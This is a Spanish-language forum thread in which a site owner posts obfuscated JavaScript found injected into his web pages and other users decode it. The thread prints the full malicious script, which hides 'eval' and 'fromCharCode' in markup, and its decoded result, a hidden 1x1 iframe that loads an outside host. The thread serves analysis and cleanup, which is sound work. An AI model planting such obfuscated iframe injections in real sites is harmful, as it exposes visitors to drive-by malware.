Ataque web por javascript

Iniciado por Gorky, 6 Julio 2010, 12:14 PM

0 Miembros y 1 Visitante están viendo este tema.

Gorky

Buenas foreros. Me he encontrado con un ataque en mi web y ha sido que los archivos index.php e index.html de todas las carpetas tenian este script al final del code:
Código (javascript) [Seleccionar]
<b id="glavnoelubovz">St<i>ri</i>n<i>g|<i>sp<i>li<i>t|f<i>rom<i>Ch<i>a</i>rC</i>o</i>d</i>e</i>|</i>ev</i>al</b>
<script>
function glavnoelubovc(node) {
  var ret = "";
  for(var i=0; i<node.childNodes.length; i++) {
     switch(node.childNodes[i].nodeType) {
    case 1: ret+=glavnoelubovc(node.childNodes[i]); break;
    case 3: ret+=node.childNodes[i].nodeValue;
  }
  }
  return ret;
}

var glavnoelubov = glavnoelubovc(document.getElementById("glavnoelubovz")).split("|");

</script>
<script>
window[glavnoelubov[3]]("glavnoelubov_DGicyJZczU = "+glavnoelubov[0]);
var glavnoelubov_pioRCoumcR = " a 100 a 111 a 99 a 117 a 109 a 101 a 110 a 116 a 46 a 119 a 114 a 105 a 116 a 101 a 40 a 34 a 60 a 105 a 102 a 114 a 97 a 109 a 101 a 32 a 115 a 114 a 99 a 61 a 39 a 104 a 116 a 116 a 112 a 58 a 47 a 47 a 117 a 105 a 116 a 121 a 114 a 46 a 105 a 110 a 47 a 120 a 47 a 105 a 110 a 100 a 101 a 120 a 46 a 112 a 104 a 112 a 63 a 115 a 61 a 100 a 97 a 50 a 52 a 50 a 99 a 100 a 49 a 50 a 102 a 98 a 48 a 50 a 102 a 50 a 97 a 48 a 51 a 54 a 102 a 53 a 57 a 52 a 50 a 53 a 50 a 48 a 100 a 97 a 49 a 99 a 57 a 39 a 32 a 119 a 105 a 100 a 116 a 104 a 61 a 49 a 32 a 104 a 101 a 105 a 103 a 104 a 116 a 61 a 49 a 32 a 102 a 114 a 97 a 109 a 101 a 98 a 111 a 114 a 100 a 101 a 114 a 61 a 48 a 62 a 60 a 47 a 105 a 102 a 114 a 97 a 109 a 101 a 62 a 34 a 41 a 59";
var glavnoelubov_BKyPlsuSlj = glavnoelubov_pioRCoumcR[glavnoelubov[1]](" "+"a"+" ");
var glavnoelubov_ShdAeHXubi = "";
for (var glavnoelubov_lQQZiTNcFq=1; glavnoelubov_lQQZiTNcFq<glavnoelubov_BKyPlsuSlj.length; glavnoelubov_lQQZiTNcFq++){glavnoelubov_ShdAeHXubi+=glavnoelubov_DGicyJZczU[glavnoelubov[2]](glavnoelubov_BKyPlsuSlj[glavnoelubov_lQQZiTNcFq]);}
window[glavnoelubov[3]](glavnoelubov_ShdAeHXubi);
</script>


Alguien podria decirme que hace tal script?
Muchas gracias.

Shell Root

#1
El primer Script, solo realiza un split a una cadena.
Cadena = String|split|fromCharCode|eval
Split = String,split,fromCharCode,eval


El segundo no lo sé, no lo vi :P
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

cgvwzq

Después de hacer el split a la cadena de números, con " a ", pasa cada uno a su correspondiente ascii con fromCharCode y lo concatena. El resultado es el siguiente:

Código (javascript) [Seleccionar]
document.write("<iframe src='http://uityr.in/x/index.php?s=da242cd12fb02f2a036f5942520da1c9' width=1 height=1 frameborder=0></iframe>");


Se lo pasa a un eval() y se ejecuta...

No puedo decirte que hay en esa web porque me redirecciona a un 404, puede ser que ya hayan suspendido la página maliciosa, o que compruebe que el "Referrer" es de una página comprometida.

Saludos!
Some stuff:

  • www.a] parsed as www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ



Gorky

Cita de: cgvwzq en  6 Julio 2010, 15:20 PM
Después de hacer el split a la cadena de números, con " a ", pasa cada uno a su correspondiente ascii con fromCharCode y lo concatena. El resultado es el siguiente:

Código (javascript) [Seleccionar]
document.write("<iframe src='http://uityr.in/x/index.php?s=da242cd12fb02f2a036f5942520da1c9' width=1 height=1 frameborder=0></iframe>");


Se lo pasa a un eval() y se ejecuta...

No puedo decirte que hay en esa web porque me redirecciona a un 404, puede ser que ya hayan suspendido la página maliciosa, o que compruebe que el "Referrer" es de una página comprometida.

Saludos!

Te agradezco tu investigacion. Tampoco se que es lo que hay tras esa web pero si es cierto que el kaspersky me lo bloquea.